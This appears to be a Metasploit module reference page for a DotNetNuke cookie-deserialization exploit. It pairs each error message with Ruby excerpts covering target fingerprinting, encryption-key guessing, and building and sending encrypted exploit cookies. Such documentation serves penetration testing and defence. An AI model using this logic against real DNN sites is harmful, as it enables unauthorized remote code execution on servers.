300:	        # If no working passphrase has been found,
301:	        # wait to allow the the chance for the last one to callback.

No valid target found or specified.


Here is a relevant code snippet related to the "No valid target found or specified." error message:

323:	    end
324:	
325:	    @target_idx = Integer(datastore['TARGET'])
326:	
327:	    if @target_idx == 0
328:	      fail_with(Failure::NoTarget, 'No valid target found or specified.')
329:	    end
330:	
331:	    # Check if 404 page is custom or not.
332:	    # Vulnerability requires custom 404 handling (enabled by default).
333:	    uri = normalize_uri(target_uri.path)

Checking for custom error page at: <URI> ...


Here is a relevant code snippet related to the "Checking for custom error page at: <URI> ..." error message:

329:	    end
330:	
331:	    # Check if 404 page is custom or not.
332:	    # Vulnerability requires custom 404 handling (enabled by default).
333:	    uri = normalize_uri(target_uri.path)
334:	    print_status("Checking for custom error page at: #{uri} ...")
335:	    res = send_request_cgi(
336:	      'uri' => uri
337:	    )
338:	
339:	    if res.code == 404 && !res.body.include?('Server Error') && res.to_s.length > 1600

Server Error


Here is a relevant code snippet related to the "Server Error" error message:

334:	    print_status("Checking for custom error page at: #{uri} ...")
335:	    res = send_request_cgi(
336:	      'uri' => uri
337:	    )
338:	
339:	    if res.code == 404 && !res.body.include?('Server Error') && res.to_s.length > 1600
340:	      print_good('Custom error page detected.')
341:	    else
342:	      print_error('IIS Error Page detected.')
343:	      return Exploit::CheckCode::Safe
344:	    end

Custom error page detected.


Here is a relevant code snippet related to the "Custom error page detected." error message:

335:	    res = send_request_cgi(
336:	      'uri' => uri
337:	    )
338:	
339:	    if res.code == 404 && !res.body.include?('Server Error') && res.to_s.length > 1600
340:	      print_good('Custom error page detected.')
341:	    else
342:	      print_error('IIS Error Page detected.')
343:	      return Exploit::CheckCode::Safe
344:	    end
345:	    return Exploit::CheckCode::Appears

IIS Error Page detected.


Here is a relevant code snippet related to the "IIS Error Page detected." error message:

337:	    )
338:	
339:	    if res.code == 404 && !res.body.include?('Server Error') && res.to_s.length > 1600
340:	      print_good('Custom error page detected.')
341:	    else
342:	      print_error('IIS Error Page detected.')
343:	      return Exploit::CheckCode::Safe
344:	    end
345:	    return Exploit::CheckCode::Appears
346:	  end
347:	

DNN Version Found: v9.0.1 - v9.1.1 - May require ENCRYPTED


Here is a relevant code snippet related to the "DNN Version Found: v9.0.1 - v9.1.1 - May require ENCRYPTED" error message:

385:	Setting target to 3 (v9.2.0 - v9.2.1). Site may also be 9.2.2.
386:	Try setting target 4 and supply a file of of verification codes or specifiy valid Key and IV values."}
387:	      )
388:	      datastore['TARGET'] = 3
389:	    elsif year == 2017
390:	      print_warning('DNN Version Found: v9.0.1 - v9.1.1 - May require ENCRYPTED')
391:	      datastore['TARGET'] = 2
392:	    elsif year < 2017 && year > 2008
393:	      print_good('DNN Version Found: v5.1.0 - v9.0.1')
394:	      datastore['TARGET'] = 1
395:	    elsif year == 2008

DNN Version is either v5.0.0 (vulnerable) or 4.9.x (not vulnerable).


Here is a relevant code snippet related to the "DNN Version is either v5.0.0 (vulnerable) or 4.9.x (not vulnerable)." error message:

391:	      datastore['TARGET'] = 2
392:	    elsif year < 2017 && year > 2008
393:	      print_good('DNN Version Found: v5.1.0 - v9.0.1')
394:	      datastore['TARGET'] = 1
395:	    elsif year == 2008
396:	      print_warning('DNN Version is either v5.0.0 (vulnerable) or 4.9.x (not vulnerable).')
397:	      datastore['TARGET'] = 1
398:	    else
399:	      print_warning('Could not determine DNN version. Target may still be vulnerable. Manually set the Target value')
400:	    end
401:	  end

Could not determine DNN version. Target may still be vulnerable. Manually set the Target value


Here is a relevant code snippet related to the "Could not determine DNN version. Target may still be vulnerable. Manually set the Target value" error message:

394:	      datastore['TARGET'] = 1
395:	    elsif year == 2008
396:	      print_warning('DNN Version is either v5.0.0 (vulnerable) or 4.9.x (not vulnerable).')
397:	      datastore['TARGET'] = 1
398:	    else
399:	      print_warning('Could not determine DNN version. Target may still be vulnerable. Manually set the Target value')
400:	    end
401:	  end
402:	
403:	  # ==============================
404:	  # Known plaintext attack to

Key not found


Here is a relevant code snippet related to the "Key not found" error message:

466:	      end
467:	    end
468:	    elapsed = Time.now - start
469:	    print_search_status(i, elapsed, total_keys)
470:	    print_line
471:	    print_error('Key not found')
472:	    vprint_status(format('Total number of Keys tried: %<n_tried>d', n_tried: i))
473:	    vprint_status(format('Time run: %<r_time>.3f seconds', r_time: elapsed.to_s))
474:	    return nil
475:	  end
476:	

DryRun enabled. No exploit payloads have been sent to the target.


Here is a relevant code snippet related to the "DryRun enabled. No exploit payloads have been sent to the target." error message:

655:	      enc_cookie = Rex::Text.encode_base64(
656:	        encrypt_data(@encryptor, cookie, @passphrases[i])
657:	      )
658:	      if @dry_run
659:	        print_line
660:	        print_warning('DryRun enabled. No exploit payloads have been sent to the target.')
661:	        print_warning("Printing first HTTP callback cookie payload encrypted with KEY: #{@passphrases[i][0, 8]} and IV: #{@passphrases[i][8, 8]}...")
662:	        print_line(enc_cookie)
663:	        break
664:	      end
665:	      execute_command(enc_cookie, host: datastore['RHOST'])

Here is a relevant code snippet related to the "Printing first HTTP callback cookie payload encrypted with KEY: <VALUE> and IV: <VALUE>..." error message:

656:	        encrypt_data(@encryptor, cookie, @passphrases[i])
657:	      )
658:	      if @dry_run
659:	        print_line
660:	        print_warning('DryRun enabled. No exploit payloads have been sent to the target.')
661:	        print_warning("Printing first HTTP callback cookie payload encrypted with KEY: #{@passphrases[i][0, 8]} and IV: #{@passphrases[i][8, 8]}...")
662:	        print_line(enc_cookie)
663:	        break
664:	      end
665:	      execute_command(enc_cookie, host: datastore['RHOST'])
666:	    end

<OPTS:HOST> - target unreachable.


Here is a relevant code snippet related to the "<OPTS:HOST> - target unreachable." error message:

735:	    res = send_request_cgi(
736:	      'uri' => uri,
737:	      'cookie' => ".DOTNETNUKE=#{@session_token};DNNPersonalization=#{cookie_payload};"
738:	    )
739:	    if !res
740:	      fail_with(Failure::Unreachable, "#{opts[:host]} - target unreachable.")
741:	    elsif res.code == 404
742:	      return true
743:	    elsif res.code == 400
744:	      fail_with(Failure::BadConfig, "#{opts[:host]} - payload resulted in a bad request - #{res.body}")
745:	    else

<OPTS:HOST> - payload resulted in a bad request - <RES.BODY>


Here is a relevant code snippet related to the "<OPTS:HOST> - payload resulted in a bad request - <RES.BODY>" error message:

739:	    if !res
740:	      fail_with(Failure::Unreachable, "#{opts[:host]} - target unreachable.")
741:	    elsif res.code == 404
742:	      return true
743:	    elsif res.code == 400
744:	      fail_with(Failure::BadConfig, "#{opts[:host]} - payload resulted in a bad request - #{res.body}")
745:	    else
746:	      fail_with(Failure::Unknown, "#{opts[:host]} - Something went wrong- #{res.body}")
747:	    end
748:	  end
749:	

<OPTS:HOST> - Something went wrong- <RES.BODY>


Here is a relevant code snippet related to the "<OPTS:HOST> - Something went wrong- <RES.BODY>" error message:

741:	    elsif res.code == 404
742:	      return true
743:	    elsif res.code == 400
744:	      fail_with(Failure::BadConfig, "#{opts[:host]} - payload resulted in a bad request - #{res.body}")
745:	    else
746:	      fail_with(Failure::Unknown, "#{opts[:host]} - Something went wrong- #{res.body}")
747:	    end
748:	  end
749:	
750:	  # ======================================
751:	  # Create and send final exploit payload

Target requires encrypted payload, but a passphrase was not found or specified.


Here is a relevant code snippet related to the "Target requires encrypted payload, but a passphrase was not found or specified." error message:

754:	  def send_exploit_payload
755:	    cmd_payload = create_payload
756:	    cookie_payload = create_cookie(cmd_payload)
757:	    if @encrypted
758:	      if @passphrase.blank?
759:	        print_error('Target requires encrypted payload, but a passphrase was not found or specified.')
760:	        return
761:	      end
762:	      cookie_payload = Rex::Text.encode_base64(
763:	        encrypt_data(@encryptor, cookie_payload, @passphrase)
764:	      )

DryRun enabled. No exploit payloads have been sent to the target.


Here is a relevant code snippet related to the "DryRun enabled. No exploit payloads have been sent to the target." error message:

762:	      cookie_payload = Rex::Text.encode_base64(
763:	        encrypt_data(@encryptor, cookie_payload, @passphrase)
764:	      )
765:	    end
766:	    if @dry_run
767:	      print_warning('DryRun enabled. No exploit payloads have been sent to the target.')
768:	      print_warning('Printing exploit cookie payload...')
769:	      print_line(cookie_payload)
770:	      return
771:	    end
772:	

Here is a relevant code snippet related to the "Printing exploit cookie payload..." error message:

763:	        encrypt_data(@encryptor, cookie_payload, @passphrase)
764:	      )
765:	    end
766:	    if @dry_run
767:	      print_warning('DryRun enabled. No exploit payloads have been sent to the target.')
768:	      print_warning('Printing exploit cookie payload...')
769:	      print_line(cookie_payload)
770:	      return
771:	    end
772:	
773:	    # Set up the payload handlers

Go back to menu.


References


See Also


Check also the following modules related to this module:

Related Nessus plugins:

Authors


  • Jon Park
  • Jon Seigel

Version


This page has been produced using Metasploit Framework version 6.2.29-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.